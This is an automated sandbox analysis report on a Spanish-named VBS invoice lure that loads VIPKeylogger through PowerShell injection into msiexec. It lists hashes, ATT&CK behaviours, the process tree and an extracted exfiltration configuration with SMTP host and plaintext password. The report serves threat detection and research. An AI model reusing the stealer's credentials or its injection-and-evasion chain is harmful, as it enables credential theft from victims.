Analysis
max time kernel: 117s
max time network: 195s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 22-10-2024 16:15
Static task: static1
Behavioral task: behavioral1
  Sample: FACTURA-ALBARANES.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: FACTURA-ALBARANES.vbs
  Resource: win10v2004-20241007-en
General
Target: FACTURA-ALBARANES.vbs
Size: 525KB
MD5: 2358bb1bd8cf609df9f1917cf4224194
SHA1: 45e0ca20b16c048979d95b59f40475f8fa282e32
SHA256: 982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e
SHA512: c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230
SSDEEP: 6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg
Malware Config
Extracted
vipkeylogger
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: 1446010
Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Blocklisted process makes network request (10 IoCs)
Processes: powershell.exe, msiexec.exe
flow  pid   process
5     1140  powershell.exe
7     1140  powershell.exe
9     2396  msiexec.exe
11    2396  msiexec.exe
13    2396  msiexec.exe
15    2396  msiexec.exe
16    2396  msiexec.exe
18    2396  msiexec.exe
20    2396  msiexec.exe
22    2396  msiexec.exe

Processes: powershell.exe, powershell.exe
pid   process
2964  powershell.exe
1140  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
17    checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes: msiexec.exe
pid   process
2396  msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: powershell.exe, msiexec.exe
pid   process
2964  powershell.exe
2396  msiexec.exe
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: msiexec.exe, powershell.exe
description  ioc                                                         process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe, powershell.exe, msiexec.exe
pid   process
1140  powershell.exe
2964  powershell.exe
2964  powershell.exe
2396  msiexec.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes: powershell.exe
pid   process
2964  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: powershell.exe, powershell.exe, msiexec.exe
description               pid   process
Token: SeDebugPrivilege   1140  powershell.exe
Token: SeDebugPrivilege   2964  powershell.exe
Token: SeDebugPrivilege   2396  msiexec.exe

Suspicious use of WriteProcessMemory (11 IoCs)
Processes: WScript.exe, powershell.exe
description                        pid   process         target process
PID 1800 wrote to memory of 1140   1800  WScript.exe     powershell.exe
PID 1800 wrote to memory of 1140   1800  WScript.exe     powershell.exe
PID 1800 wrote to memory of 1140   1800  WScript.exe     powershell.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
PID 2964 wrote to memory of 2396   2964  powershell.exe  msiexec.exe
Processes
C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURA-ALBARANES.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 1800
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1140
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted; same command line as the powershell.exe instance with PID 1140]"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2964
  C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2396
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE633XOEDIK3IP62JHQE.temp
  Filesize: 7KB
  MD5: a4910c1465c33c72c16c7ed565a9e426
  SHA1: 884b2bb4ac964c160409883fc2550ff458912ab3
  SHA256: b8722b2c2efa1aebd3e63c43b853f8a76eb14fa400029bfe783907ec09bb096c
  SHA512: 3f25e552387a68c4bdd908411e7cee2ff49f890bc756c8928ae8716aebdd0066938dafbf8d6aad7bea0545e9bc7bd0df67bb1beb2a97a5f5c294a039774550a7
- Filesize: 460KB
  MD5: 15d4bf8d1435c92eafc43ebdff22b873
  SHA1: 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
  SHA256: ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
  SHA512: 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c